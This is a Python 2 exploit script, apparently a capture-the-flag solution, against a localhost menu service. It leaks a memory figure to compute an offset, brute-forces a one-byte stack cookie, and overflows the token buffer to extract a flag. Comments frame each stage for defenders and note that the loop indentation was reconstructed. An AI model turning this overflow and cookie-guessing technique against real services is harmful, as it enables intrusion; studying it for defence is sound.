import string
from sock import Sock
# Python 2 proof-of-concept client for a menu-driven service on localhost.
# It works in three stages: it reads the memory-usage figure from menu
# option 2, guesses a single "stack cookie" byte through menu option 1, and
# then sends four oversized tokens and collects a word from each reply.
#
# What this shows a defender about the service (as far as the script goes):
#   * the token input is evidently not length-limited before it is copied,
#     because the script relies on sending `offset` bytes plus extra bytes;
#   * the memory-management report gives the client the number it uses to
#     compute that offset;
#   * the reply to a token differs depending on whether the trailing byte
#     matched, so the cookie can be guessed one value at a time.
# Bounding the token length, keeping internal memory figures out of the
# client-visible menu, and not letting a client retry after a failed cookie
# check would each break one of these stages.
#
# NOTE(review): the page lost all indentation; loop bodies below are a
# reconstruction -- confirm against the original file.

MENU_END = '[2] Memory management\r\n'
TOKEN_PROMPT = 'Token can only contain the characters [A-Z/a-z/0-9]\r\n\r\n'

conn = Sock('127.0.0.1', 1235)
l = 0  # never read anywhere in the visible script

# Stage 1: ask for the memory report and derive the offset from it.
conn.read_until(MENU_END)
conn.send('2\r')
report = conn.read_until(MENU_END)
# The figure is the second-to-last whitespace-separated field on the
# second line of the report.
report_line = report.split('\r\n')[1]
used = int(report_line.split()[-2])
cookie_offset = 4088 - used
print "Stack cookie is at offset: %s" % cookie_offset

# Stage 2: try byte values 60..255 until the reply line contains 'Welcome'.
# Only one byte is ever recorded, which suggests a one-byte cookie
# (presumably -- the target is not shown on this page).
cookie = ''
filler = 'A' * cookie_offset
for guess in range(60, 256):
    conn.send('1\r')
    conn.read_until(TOKEN_PROMPT)
    conn.send(filler + cookie + chr(guess) + '\r')
    first_line = conn.read_line()
    if 'Welcome' not in first_line:
        # Placed at loop level to mirror the second loop; see the
        # reconstruction note at the top.
        conn.read_until(MENU_END)
        continue
    cookie += chr(guess)
    print "Cookie found: ", repr(cookie)
    break

# Stage 3: four requests that differ only in the last byte (0xcf, 0xd7,
# 0xdf, 0xe7). Each reply contributes its second whitespace-separated word.
# Presumably the three bytes after the cookie overwrite saved state on the
# target; the page does not show the service, so that is not confirmed.
padding = (string.uppercase * 10)[:cookie_offset]
flag = ''
for last_byte in (0xcf + step * 8 for step in range(4)):
    conn.send('1\r')
    conn.read_until(TOKEN_PROMPT)
    conn.send(padding + cookie + '\x08\xff' + chr(last_byte) + '\r')
    reply = conn.read_until(MENU_END)
    flag += reply.split()[1]
print "FLAG:", flag